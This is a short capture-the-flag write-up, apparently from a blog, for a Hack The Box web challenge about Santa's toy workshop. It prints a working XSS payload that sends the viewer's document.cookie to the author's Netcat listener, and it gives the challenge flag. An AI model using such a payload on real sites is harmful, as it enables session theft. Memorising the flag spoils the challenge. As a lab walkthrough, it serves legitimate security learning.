Challenge Files - Local Docker Web Server: web_toy_workshop.zip
Exploit Technique Used: XSS - Cross Site Scripting
Details:
When you surf to the webserver, you see a colorful animation of Santa's Toyshop at work converting recyclables into nicely wrapped presents. So that's what happens to my soda cans!
After carefully analyzing the included local Docker web files and webserver source code, it took me an embarrassingly long time to figure out you can click on the elves' heads to bring up this prompt:
This is a clue the manager will be checking whatever messages we send him/her, so this immediately brings to mind a cookie stealing, cross-site scripting type of attack. Therefore, I created a Netcat listener on my public Amazon Ubuntu server and attempted to steal the manager's cookie by sending him/her this:
<script>new Image().src = "http://<my_ip:17777/"+encodeURI(document.cookie);</script>
No more than two mins later, I was greeted with the flag! In which %7B stands for '{' and %7D stands for '}':
HTB{3v1l_3lv3s_4r3_r1s1ng_up!}
No comments:
Post a Comment